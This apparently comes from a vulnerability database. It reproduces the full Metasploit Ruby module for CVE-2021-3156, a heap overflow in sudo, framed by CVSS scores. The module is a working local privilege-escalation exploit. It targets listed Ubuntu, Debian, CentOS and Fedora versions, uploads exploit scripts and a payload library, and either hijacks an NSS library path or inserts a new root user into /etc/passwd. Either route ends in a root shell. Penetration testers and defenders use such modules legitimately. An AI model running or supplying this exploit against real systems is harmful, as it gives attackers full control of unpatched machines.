CVSS2
Attack Vector
LOCAL
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
99.5%
A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2 through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this implementation leverages the overflow to overwrite a service_user struct in memory to reference an attacker controlled library which results in it being loaded with the elevated privileges held by sudo.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'digest/sha2'
require 'tempfile'
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Post::File
include Msf::Post::Unix
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Sudo Heap-Based Buffer Overflow',
'Description' => %q{
A heap based buffer overflow exists in the sudo command line utility that can be exploited by a local attacker
to gain elevated privileges. The vulnerability was introduced in July of 2011 and affects version 1.8.2
through 1.8.31p2 as well as 1.9.0 through 1.9.5p1 in their default configurations. The technique used by this
implementation leverages the overflow to overwrite a service_user struct in memory to reference an attacker
controlled library which results in it being loaded with the elevated privileges held by sudo.
},
'License' => MSF_LICENSE,
'Author' => [
'Qualys', # vulnerability discovery and analysis
'Spencer McIntyre', # metasploit module
'bwatters-r7', # metasploit module
'smashery', # metasploit module
'blasty <[email protected]>', # original PoC
'worawit', # original PoC
'Alexander Krog' # detailed vulnerability analysis and exploit technique
],
'SessionTypes' => ['shell', 'meterpreter'],
'Platform' => ['unix', 'linux'],
'References' => [
['URL', 'https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit'],
['URL', 'https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt'],
['URL', 'https://www.kalmarunionen.dk/writeups/sudo/'],
['URL', 'https://github.com/blasty/CVE-2021-3156/blob/main/hax.c'],
['CVE', '2021-3156'],
],
'Targets' => [
[ 'Automatic', {} ],
[ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)', { exploit_script: 'nss_generic1', exploit_params: [ 56, 54, 63, 212 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: /^Ubuntu 20\.04/ } ],
[ 'Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) - alternative', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 20\.04/ } ],
[ 'Ubuntu 19.04 x64 (sudo v1.8.27, libc v2.29)', { exploit_script: 'nss_generic1', exploit_params: [ 56, 54, 63, 212 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: /^Ubuntu 19\.04/ } ],
[ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)', { exploit_script: 'nss_generic1', exploit_params: [ 56, 54, 63, 212 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: /^Ubuntu 18\.04/ } ],
[ 'Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27) - alternative', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 18\.04/ } ],
[ 'Ubuntu 16.04 x64 (sudo v1.8.16, libc v2.23)', { exploit_script: 'nss_u16', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 16\.04/ } ],
[ 'Ubuntu 14.04 x64 (sudo v1.8.9p5, libc v2.19)', { exploit_script: 'nss_u14', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^Ubuntu 14\.04/ } ],
[ 'Debian 10 x64 (sudo v1.8.27, libc v2.28)', { exploit_script: 'nss_generic1', exploit_params: [ 64, 49, 60, 214 ], exploit_technique: 'nss', lib_needs_space: true, version_fingerprint: %r{^Debian GNU/Linux 10$} } ],
[ 'Debian 10 x64 (sudo v1.8.27, libc v2.28) - alternative', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: %r{^Debian GNU/Linux 10$} } ],
[ 'CentOS 8 x64 (sudo v1.8.25p1, libc v2.28)', { exploit_script: 'nss_generic2', exploit_params: [ ], exploit_technique: 'nss', lib_needs_space: false, version_fingerprint: /^CentOS Linux release 8/ } ],
[ 'CentOS 7 x64 (sudo v1.8.23, libc v2.17)', { exploit_script: 'userspec_c7', exploit_technique: 'userspec', version_fingerprint: /^CentOS Linux release 7/ } ],
[ 'CentOS 7 x64 (sudo v1.8.23, libc v2.17) - alternative', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^CentOS Linux release 7/ } ],
[ 'Fedora 27 x64 (sudo v1.8.21p2, libc v2.26)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 27/ } ],
[ 'Fedora 26 x64 (sudo v1.8.20p2, libc v2.25)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 26/ } ],
[ 'Fedora 25 x64 (sudo v1.8.18, libc v2.24)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 25/ } ],
[ 'Fedora 24 x64 (sudo v1.8.16, libc v2.23)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 24/ } ],
[ 'Fedora 23 x64 (sudo v1.8.14p3, libc v2.22)', { exploit_script: 'userspec_generic', exploit_technique: 'userspec', version_fingerprint: /^Fedora release 23/ } ],
[ 'Manual', { exploit_script: 'nss_generic1', exploit_technique: 'nss', lib_needs_space: true } ],
],
'DefaultTarget' => 0,
'Arch' => ARCH_X64,
'DefaultOptions' => { 'PrependSetgid' => true, 'PrependSetuid' => true, 'WfsDelay' => 10 },
'DisclosureDate' => '2021-01-26',
'Notes' => {
'AKA' => [ 'Baron Samedit' ],
'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
'Reliability' => [REPEATABLE_SESSION],
'Stability' => [CRASH_SAFE]
}
)
)
register_options([
OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ])
])
register_advanced_options([
OptString.new('Lengths', [ false, 'The lengths to set as used by the manual target. (format: #,#,#,#)' ], regex: /(\d+(, *| )){3}\d+/, conditions: %w[TARGET == Manual]),
OptString.new('NewUser', [ false, 'A username to add as root (if required by exploit target)', 'msf' ], regex: /^[a-z_]([a-z0-9_-]{0,31}|[a-z0-9_-]{0,30}\$)$/),
OptString.new('NewPassword', [ false, 'A password to add for NewUser (if required by exploit target)' ]),
])
deregister_options('COMPILE')
end
# A password hash that we have confidence that we have inserted into /etc/passwd
@inserted_password_hash = nil
def get_versions
versions = {}
output = cmd_exec('sudo --version')
if output
version = output.split("\n").first.split(' ').last
versions[:sudo] = version if version =~ /^\d/
end
versions
end
def check
sudo_version = get_versions[:sudo]
return CheckCode::Unknown('Could not identify the version of sudo.') if sudo_version.nil?
# fixup the p number used by sudo to be compatible with Rex::Version
sudo_version.gsub!(/p/, '.')
vuln_builds = [
[Rex::Version.new('1.8.2'), Rex::Version.new('1.8.31.2')],
[Rex::Version.new('1.9.0'), Rex::Version.new('1.9.5.1')],
]
if sudo_version == '1.8.31'
# Ubuntu patched it as version 1.8.31-1ubuntu1.2 which is reported as 1.8.31
return CheckCode::Detected("sudo #{sudo_version} may be a vulnerable build.")
end
if vuln_builds.any? { |build_range| Rex::Version.new(sudo_version).between?(*build_range) }
return CheckCode::Appears("sudo #{sudo_version} is a vulnerable build.")
end
CheckCode::Safe("sudo #{sudo_version} is not a vulnerable build.")
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
write_file path, data
register_file_for_cleanup(path)
end
def get_automatic_targets
sysinfo = get_sysinfo
selected_targets = targets.each_index.select { |index| targets[index].opts[:version_fingerprint]&.match(sysinfo[:version]) }
fail_with(Failure::NoTarget, 'Failed to automatically identify the target.') if selected_targets.empty?
selected_targets
end
def find_exec_program
return 'python' if command_exists?('python')
return 'python3' if command_exists?('python3')
return false
end
def exploit
if target.name == 'Automatic'
resolved_indices = get_automatic_targets
resolved_target = targets[resolved_indices[0]]
print_status("Using automatically selected target: #{resolved_target.name}")
else
resolved_target = target
end
case resolved_target[:exploit_technique]
when 'nss'
exploit_nss(resolved_target)
when 'userspec'
exploit_userspec(resolved_target)
end
do_post_exploit_checks
end
def do_post_exploit_checks
# Just wait a bit; this should come in real fast if it's going to though
4.times do |_i|
Rex.sleep(0.5)
# break if we get the shell
break if session_created?
end
# Now that everything's done, if we completed the exploit but didn't get a session, inform the user if there are other options available to them
if !session_created? && (target.name == 'Automatic') && !@inserted_password_hash
resolved_indices = get_automatic_targets
if resolved_indices.length > 1
print_status('')
print_status('Alternative exploit target(s) exist for this OS version:')
resolved_indices[1..].each { |index| print_status("#{index}: #{targets[index].name}") }
print_status('Run `set target <id>` to select an alternative exploit script')
end
end
if @inserted_password_hash && !session_created?
print_warning('/etc/passwd overwritten, but no session created.')
print_warning('Manual cleanup of the new user in the /etc/passwd file is required.')
print_warning('Take note of the username and password above - these should work to manually escalate privileges.')
end
end
def on_new_session(new_session)
super
# userspec exploits edited /etc/passwd; now that we have a root shell, we can clean that up
if @inserted_password_hash
# We added a line to /etc/passwd
print_status('Cleaning up /etc/passwd')
tf = Tempfile.new('meterp')
tf_out = Tempfile.new('meterp')
temp_path = tf.path
new_session.fs.file.download_file(temp_path, '/etc/passwd')
pw = @inserted_password_hash.to_s
begin
f_in = File.open(temp_path, 'rb')
f_out = File.open(tf_out.path, 'wb')
f_in.each_line do |line|
unless line.include?(pw)
f_out.write(line)
end
end
ensure
f_out.close
f_in.close
end
new_session.fs.file.upload_file('/etc/passwd', tf_out.path)
begin
::File.delete(temp_path)
rescue StandardError
nil
end
begin
::File.delete(tf_out.path)
rescue StandardError
nil
end
end
end
def exploit_nss(resolved_target)
if target.name == 'Manual'
fail_with(Failure::BadConfig, 'The "Lengths" advanced option must be specified for the manual target') if datastore['Lengths'].blank?
exploit_params = datastore['Lengths'].gsub(/,/, ' ').gsub(/ +/, ' ')
else
exploit_params = resolved_target[:exploit_params].join(' ')
end
python_binary = find_exec_program
fail_with(Failure::NotFound, 'The python binary was not found') unless python_binary
vprint_status("Using '#{python_binary}' to run exploit")
exploit_script = resolved_target[:exploit_script]
space = resolved_target[:lib_needs_space] ? ' ' : ''
path = datastore['WritableDir']
overwrite_path = rand_overwrite_path # the part that is overwritten in memory to construct the full path
lib_file_path = "libnss_#{overwrite_path}#{space}.so.2" # the full path
python_script_name = rand_text_alphanumeric(5..10) + '.py'
upload("#{path}/#{python_script_name}", exploit_data('CVE-2021-3156', "#{exploit_script}.py"))
register_files_for_cleanup("#{path}/#{python_script_name}")
mkdir("#{path}/#{lib_file_path.rpartition('/').first}")
upload("#{path}/#{lib_file_path}", generate_payload_dll)
cmd = "#{python_binary} #{path}/#{python_script_name} #{exploit_params} #{overwrite_path} #{path}"
vprint_status("Running #{cmd}")
cmd_exec(cmd)
end
def exploit_userspec(resolved_target)
fail_with(Failure::BadConfig, 'The "NewUser" advanced option must be specified for this target') if datastore['NewUser'].blank?
python_binary = find_exec_program
fail_with(Failure::NotFound, 'The python binary was not found') unless python_binary
vprint_status("Using '#{python_binary}' to run exploit")
exploit_script = resolved_target[:exploit_script]
new_user = datastore['NewUser']
new_password = datastore['NewPassword']
new_password ||= rand_text_alpha_lower(15)
# Verify that user doesn't already exist (otherwise exploit will succeed but password won't work)
users = get_users
user_exists = users.map { |u| u[:name] }.include? new_user
fail_with(Failure::BadConfig, "#{new_user} already exists on target system") if user_exists
password_hash = new_password.crypt('$6$' + rand(36**8).to_s(36))
path = datastore['WritableDir']
python_script_name = rand_text_alphanumeric(5..10) + '.py'
upload("#{path}/#{python_script_name}", exploit_data('CVE-2021-3156', "#{exploit_script}.py"))
register_files_for_cleanup("#{path}/#{python_script_name}")
cmd = "#{python_binary} #{path}/#{python_script_name} #{new_user} '#{password_hash}'"
vprint_status("Running #{cmd}")
print_status("A successful exploit will create a new root user #{new_user} with password #{new_password}")
print_status('Brute forcing ASLR (can take several minutes)...')
output = cmd_exec(cmd, nil, 600)
if /Success at/ =~ output
@inserted_password_hash = password_hash
print_good("Success! Created new user #{new_user} with password #{new_password}")
elf_name = rand_text_alphanumeric(5..10)
uploaded_path = "#{path}/#{elf_name}"
upload(uploaded_path, generate_payload_exe)
chmod(uploaded_path, 0o555)
cmd_exec("/bin/bash -c \"echo #{new_password} | su #{new_user} -c #{uploaded_path}&\"")
elsif /Brute force failed/ =~ output
print_error('Brute force failed. This can occur 2% of the time even when vulnerable.')
else
print_error('Exploit failed - unlikely to succeed')
end
end
def rand_overwrite_path
length = 6
split_pos = rand(length)
"#{rand_text_alphanumeric(split_pos)}/#{rand_text_alphanumeric(length - split_pos)}"
end
end
CVSS2
Attack Vector
LOCAL
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:L/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
99.5%